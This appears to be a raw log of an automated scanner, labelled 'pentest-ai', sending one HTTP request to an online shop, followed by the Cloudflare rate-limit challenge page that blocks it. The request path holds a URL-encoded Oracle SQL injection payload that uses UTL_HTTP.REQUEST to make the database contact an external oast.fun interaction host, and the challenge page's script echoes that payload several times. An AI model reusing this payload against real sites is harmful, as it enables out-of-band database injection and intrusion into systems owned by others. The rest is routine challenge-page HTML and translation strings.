REQUEST:
GET https://my.myfirst.tech//my.myfirst.tech/cdn/shop/t/%27%20%7C%7C%20%28SELECT%20UTL_HTTP.REQUEST%28%27http%3A%2F%2Fh0cqg45t8jh21623dc0zoi81ftlixdu9x.oast.fun%2F%27%29%20FROM%20dual%29%20%7C%7C%20%27/assets/component-list-payment.css
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9950
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c84798ae44a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=K92SDX4ZgztVzfWw5whSzUw4sBNE7QoZ%2FgcI35ev%2BDj1z9Ge7VjLgrQBjDlCe4PbOutdkXOYYOlFRlLvkdg1EO%2FH1CbiIl6dRbDYSzIaYsppNEZvzUnLg1M6hL9Nh9R5Rg%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c84798ae44a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 't1S4PyT19psI1ypbCs9OSq88hdk4CMKSiu4jhbNZg2o-1784281168-1.2.1.1-jWJCCP8EO0XBkDxyl5cor_ITiZaD3txoGgtljZVPiPUqIwBBLU2z_peVILY7riGp',cITimeS: '1784281168',cRay: 'a1c84798ae44a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/my.myfirst.tech/cdn/shop/t/'%20%7C%7C%20(SELECT%20UTL_HTTP.REQUEST('http:%2F%2Fh0cqg45t8jh21623dc0zoi81ftlixdu9x.oast.fun%2F')%20FROM%20dual)%20%7C%7C%20'/assets/component-list-payment.css?__cf_chl_tk=EM7faWehUIcCB1OmlkuP0RN0nvIbnH1j5gIpwYcryYI-1784281168-1.0.1.1-tR0Y_QlKBvn.PDwdpGNxwDVbUchgRfyMxOwzn5F9a78",cvId: '3',cZone: 'my.myfirst.tech',fa:"/my.myfirst.tech/cdn/shop/t/'%20%7C%7C%20(SELECT%20UTL_HTTP.REQUEST('http:%2F%2Fh0cqg45t8jh21623dc0zoi81ftlixdu9x.oast.fun%2F')%20FROM%20dual)%20%7C%7C%20'/assets/component-list-payment.css?__cf_chl_f_tk=EM7faWehUIcCB1OmlkuP0RN0nvIbnH1j5gIpwYcryYI-1784281168-1.0.1.1-tR0Y_QlKBvn.PDwdpGNxwDVbUchgRfyMxOwzn5F9a78",md: 'MaDuyG.9ohyJof.laVm6Z7MeuS2JCtY50.9qCJKGbpw-1784281168-1.2.1.1-pYN79y3LzEMYLIcd9D90slQj6xGqWWIRqJNkEBY5_ASGiEloJw2xvtw5gjET4pF6mHq415cY.DV0xTmjCeVay4rcOSn1P._Lnjy7.cf3oZFDN9sAK94NSky3E8PpCHb7PzvJ0rDqvNy_1yPOtiBTPHhBOTdi1ZS5ZAx_W..YHWFF1yAIuHjeUkRmkNawVXja9sNbyPUxYyHL0loL5Mi91ynYL2aZx7Ai0erQtBhFnQQoBOLCYpWXiywXBU7Y6vE1QxBt0NfCvPjdwv4r1mylOV3DORCkK_8WNOha84ktrQTKtHLlRy0R9jVInIfTGi2Td5lE85R1u8dhUIxLDv8oxO9mi2S398OccJYAqgNucjSl.LRW_c0ysdAlRO9a8UodFKRiP.9Ebb4Nc4uZPNrwS4BvFupL91Y4bxpr28uQBogr2mmIEctUjdmTq7MGGuZsAv6X6nfPYs4EwJY_LZCTl2FdM7gRu9zu6fh_1hh4aTFMCiDnaMVNc9La79O6ZDB2w4W80q1kqzTOCtrEAUUQOJkaIPDqWsmyUhzs.ot.IDiRFoatsnSQ0D4Bi_I0XLiZCeX3Qhfa9px4.ZNgjSQLkgRvkzzKGdlyhpQ6V_ri9Ybq2J6Xl0di4XU0PzfiZSJS2fZhWz1Nx6SvyvCilmtFw33pKpHAIPhY6lkyjfJQQJr5oeYDURTt304jbTQStmghFTiJARWh4Bn6r2nnBBGSCWv56nklJVo8qsYtOa.5TuSRPY4r3lYYyR4si7F9M0eTTLZ7oBiRwdXm.2VhR4CgeuH3xooJlbQthe9EhjSsSmyFPI6P4MTozOcOq22dIE8TVDWUajvHMzZP_FesiPbKiNPsnVro0oR10e0SMEQmnD09J0Rqjdb4ioKAzlrfnH8zQncLSaJehxC3FvBow0VHisCLe4u.AefBznQoYrEQ2tqRC6liaQ6.9kwGcU14d_I8XGYO546bo5xyv3sxEmC5fZGwr_2qYRkbxu_IKhP6dcQU0z8sCB3BASqzppLXApimsqEz6PqysPctwPt4mJIdBZFnv1l0jzQewf7XZiVaqBSD5HjbjDXmGaLcwz0V4ddi2Yml6gWDFzevR4G.iWatxBgX4E7inJeFl2QJfJ8tDvghnn8sm1typpXaNSjkzXFD0Fse2aCWYMR2HnxhSw9l2O9KJt2a8xPusDV_yKTs7EnmOe7lH7fmeY4F7PEbXqQBo6v_gIWf.3crB19Z9en81qlHbLuUrdJv7yFwPl8TSHVIw6ICP2uCcqmg9CA.YVRyQz74m6yNyK8F0UMIOnr4lg7AyMZW6lNors9CmJeT0jv_Mwy7Bq6VyTMp034bw83jUZrLjgMbmF5zN4EBJzsLNrmVPrOCds6duRHWNk.ZL0M',mdrd: 'Dw4mjq8BTjppcHY3ENHSqepqNX.30ltzfy3frr43WjA-1784281168-1.2.1.1-yXyUXARJP3tj310qpx40V4oDLgZzUVWhqBEhOLuMe9CQzGbI1beesAARVbNe3MLJCT9Hp0bkHe5Rzw.zOfeERCXBwfP717H3ob5d.gj8NWxwYiMfEa4OI9kl0FzHj.WbYYX7dlc7WB76wMMrDxvQhiupNbTfuhV0r96UDf0QDUkeNU.BkAZ8jAs3lje7oSc8RLtnp852qizXHdi9Sx7nEFXEhyAYtZNf3HYoDSSH6XedyY8HvfSI_Q8FjCIVY0QD',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c84798ae44a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/my.myfirst.tech/cdn/shop/t/'%20%7C%7C%20(SELECT%20UTL_HTTP.REQUEST('http:%2F%2Fh0cqg45t8jh21623dc0zoi81ftlixdu9x.oast.fun%2F')%20FROM%20dual)%20%7C%7C%20'/assets/component-list-payment.css?__cf_chl_rt_tk=EM7faWehUIcCB1OmlkuP0RN0nvIbnH1j5gIpwYcryYI-1784281168-1.0.1.1-tR0Y_QlKBvn.PDwdpGNxwDVbUchgRfyMxOwzn5F9a78"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
